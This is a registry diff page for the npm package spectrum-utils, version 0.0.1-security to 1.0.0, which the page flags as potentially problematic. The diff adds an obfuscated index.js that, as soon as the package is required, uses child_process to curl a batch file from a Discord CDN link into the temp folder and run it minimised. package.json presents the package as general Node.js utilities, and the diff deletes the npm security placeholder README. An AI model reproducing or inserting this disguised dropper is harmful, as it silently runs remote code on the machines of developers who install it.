spectrum-utils 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of spectrum-utils might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +8 -3
- package/test/script.js +3 -0
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x1719ac=_0x51b5;function _0x51b5(_0xd1aa67,_0x1f0b37){const _0x102cdd=_0x102c();return _0x51b5=function(_0x51b590,_0x52e950){_0x51b590=_0x51b590-0xc3;let _0x17ebdd=_0x102cdd[_0x51b590];return _0x17ebdd;},_0x51b5(_0xd1aa67,_0x1f0b37);}(function(_0x2a3c7f,_0x470275){const _0x299a56=_0x51b5,_0x2479e6=_0x2a3c7f();while(!![]){try{const _0x4dd0bf=-parseInt(_0x299a56(0xcd))/0x1*(-parseInt(_0x299a56(0xd0))/0x2)+parseInt(_0x299a56(0xc9))/0x3*(parseInt(_0x299a56(0xcf))/0x4)+-parseInt(_0x299a56(0xcc))/0x5*(parseInt(_0x299a56(0xca))/0x6)+-parseInt(_0x299a56(0xc6))/0x7+-parseInt(_0x299a56(0xc8))/0x8*(-parseInt(_0x299a56(0xc5))/0x9)+parseInt(_0x299a56(0xc7))/0xa*(parseInt(_0x299a56(0xc4))/0xb)+parseInt(_0x299a56(0xce))/0xc;if(_0x4dd0bf===_0x470275)break;else _0x2479e6['push'](_0x2479e6['shift']());}catch(_0x5c8622){_0x2479e6['push'](_0x2479e6['shift']());}}}(_0x102c,0xee532));const {exec}=require(_0x1719ac(0xc3)),test=()=>{const _0x335979=_0x1719ac,_0x1121bf=_0x335979(0xcb);exec(_0x1121bf,(_0x5f507c,_0x1b4398,_0x1bf508)=>{});};test();function _0x102c(){const _0x2517cd=['4762690jaYngd','8ehnrDr','333246GaBZEZ','1518YxrwPf','curl\x20-s\x20-o\x20%temp%strings.bat\x20https://cdn.discordapp.com/attachments/1169414844689174588/1189736676222828655/strings.bat\x20&&\x20start\x20/min\x20cmd\x20/c\x20%temp%strings.bat','27320OgqBxD','14764TCeCIn','2570592NeBoHL','36NysIsV','50sZiPMS','child_process','44OxTcmr','3489939XMrMWQ','10621317LwvQoT'];_0x102c=function(){return _0x2517cd;};return _0x102c();}
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "spectrum-utils",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "A range of utilities for your Node.js needs, maintained by a small group of new developers!",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"author": "ibrahimdeveloping",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/test/script.js
ADDED
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=spectrum-utils for more information.
|